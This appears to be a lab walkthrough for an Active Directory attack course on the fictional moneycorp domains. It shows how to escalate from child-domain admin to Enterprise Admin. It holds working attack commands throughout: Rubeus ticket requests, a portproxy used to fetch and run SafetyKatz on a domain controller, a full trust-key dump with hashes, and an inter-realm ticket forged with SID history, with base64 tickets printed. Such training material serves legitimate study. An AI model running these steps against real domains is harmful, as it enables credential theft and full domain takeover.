18 - LO1️8️

Learning Object 18

Tasks

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key

Flag 29 [Student VM] - SID history injected to escalate to Enterprise Admins 🚩

Solutions

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key

We need the trust key for the trust between dollarcorp and moneycrop, which can be retrieved using Mimikatz or SafetyKatz.

Start a process with DA privileges. Run the below command from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:04:35 PM - CLEAR   - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
        * aes256_hmac       6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
        * aes128_hmac       7217c5114ba08994c10edf30106e5ce8
        * rc4_hmac_nt       5f8e757822d6f6f2977af2dc94135713

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
        * aes256_hmac       1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
        * aes128_hmac       ceb4bb60cc4546c039ca70454cf27321
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:02:53 PM - CLEAR   - ac bd a9 e1 65 26 f5 3a 41 c9 e5 72 33 d1 f0 41 9b 84 d9 8f 35 01 a2 02 76 a0 79 2c a8 a0 82 19 6f d5 cf 43 94 cd df e0 21 c3 00 5b b3 cc b7 ac a1 f1 2e bf 74 91 7d f7 e4 ee 11 86 32 aa 0f 8d dc ce fb 3d 88 e8 12 1e 89 4e 24 05 ce 7f 42 bb dd ed e5 07 46 cc 12 2d b3 5c 06 e3 ca b0 9e 8e c0 b5 f3 77 29 12 86 68 b7 c8 15 04 65 49 04 da cf 0c 9d 52 3c df e5 c2 68 d8 a1 95 22 89 7d f5 4a 00 be 42 02 2d 24 42 8e 76 89 9b c6 05 f2 02 04 95 5d 21 55 a4 46 bc 80 26 b3 ef b8 66 80 9c f3 de 96 62 53 ec 41 d5 d9 7f 87 31 65 74 01 19 35 c9 f6 a8 5c 36 ef ea 70 27 aa b5 f2 2f 75 f1 37 9b d5 8e 94 94 36 e9 2f 3c a5 96 bc 4b ca 62 cd 7d ef c5 0c 78 2a d5 97 4b 46 74 5c 95 11 63 ee 06 8d f4 d7 e8 df c7 4a fe 61 2a 5e d5 f5 bd
        * aes256_hmac       81bd8c045f76d05865b297d68a97a264e7293a2859cd90fbf72d288e44704f8e
        * aes128_hmac       8791c8a4a72eb4cd025bbda1a1dbb925
        * rc4_hmac_nt       c3f0bd731f242a1c1e3d2f2409d2e2df

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
        * aes256_hmac       8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
        * aes128_hmac       f97130aff8d849fa56b61a80d77492b0
        * rc4_hmac_nt       e1ff686c5ac2880aaecb34a8c8db19ee


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
        * aes128_hmac       1f367d7f4a602f7db49b28e8954e38b3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
        * aes128_hmac       54713b68042823a0d642e3c8b55f2bf3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
        * aes128_hmac       99e79607dc6c200854a32f6421f80e6c
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
        * aes128_hmac       d39fd719f0a4e95b7b2a5c39d1c7feb2
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
        * aes128_hmac       65770a68dff396a49468fe35cbc98cbe
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
        * aes128_hmac       0c32942d43e18125da040ada11ee8d5e
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
        * aes128_hmac       aaaba3a50e251cbafda5bf205e9dd7ec
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

Let's Forge a ticket with SID History of Enterprise Admins. Run the below command into a new shell:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

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

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket: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

Once the ticket is injected, we can access mcorp-dc:

winrs -r:mcorp-dc.moneycorp.local cmd

Flag 29 [Student VM] - SID history injected to escalate to Enterprise Admins 🚩

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

SID history injected to escalate to Enterprise Admins in details to forge a ticket with SID History of Enterprise Admins is: S-1-5-21-335606122-960912869-XXXXXXXXXXXXXXXXXX